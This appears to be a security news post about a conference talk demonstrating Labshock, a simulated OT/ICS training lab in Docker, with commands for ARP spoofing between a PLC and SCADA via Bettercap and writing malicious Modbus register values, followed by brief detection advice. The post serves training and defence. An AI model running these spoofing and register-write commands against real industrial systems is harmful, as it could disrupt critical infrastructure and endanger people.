Listen to this Post

Michael Weng, a Senior OT Security Specialist at SektorCERT, will demonstrate Labshock, a simulated OT/ICS security environment, at BSides Aarhus 2025. The session will showcase a Man-in-the-Middle (MitM) attack in an Industrial Control System (ICS) where a SCADA system displays manipulated readouts while an attacker controls the PLC underneath—all running in Docker.
You Should Know:
1. Deploying Labshock in Docker
Labshock is designed for OT/ICS security training. Below are the steps to deploy it:
Clone the Labshock repository git clone https://github.com/zakharb/labshock.git Navigate to the Labshock directory cd labshock Build the Docker environment docker-compose build Launch the Labshock simulation docker-compose up -d
2. Simulating a MitM Attack in OT/ICS
To execute a MitM attack in this environment, use Ettercap or Bettercap:
Install Bettercap (for ARP spoofing) sudo apt install bettercap Launch Bettercap sudo bettercap -iface eth0 Start ARP spoofing between PLC and SCADA set arp.spoof.targets <PLC_IP>,<SCADA_IP> arp.spoof on
3. Manipulating PLC Registers
Using Modbus CLI, an attacker can alter PLC registers while SCADA remains unaware:
Install Modbus CLI pip install modbus-cli Connect to the PLC modbus --host <PLC_IP> --port 502 read_holding_registers 0 10 Write malicious values modbus --host <PLC_IP> --port 502 write_register 0 9999
4. Detecting & Preventing OT Attacks
To defend against such attacks, use:
- Network Segmentation (Firewalls, VLANs)
- Encrypted Protocols (Modbus/TCP with TLS)
- Anomaly Detection Tools (Wireshark, Suricata)
Monitor OT traffic with Wireshark sudo wireshark -k -i eth0 -Y "modbus" Use Suricata for ICS threat detection sudo suricata -c /etc/suricata/suricata.yaml -i eth0
What Undercode Say
Labshock provides a realistic OT/ICS attack simulation, helping security professionals understand vulnerabilities in critical infrastructure. The ease of deployment in Docker makes it accessible for red/blue teams. Future enhancements could include AI-driven anomaly detection and automated exploit prevention.
Prediction
As OT/ICS attacks rise, tools like Labshock will become essential for hands-on cybersecurity training, leading to wider adoption in industrial security certifications.
Expected Output:
- Successful Labshock deployment in Docker
- Executed MitM attack between PLC and SCADA
- Manipulated PLC registers without SCADA detection
- Monitored and defended against attacks using Wireshark/Suricata
Relevant URLs:
References:
Reported By: Michael Weng – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


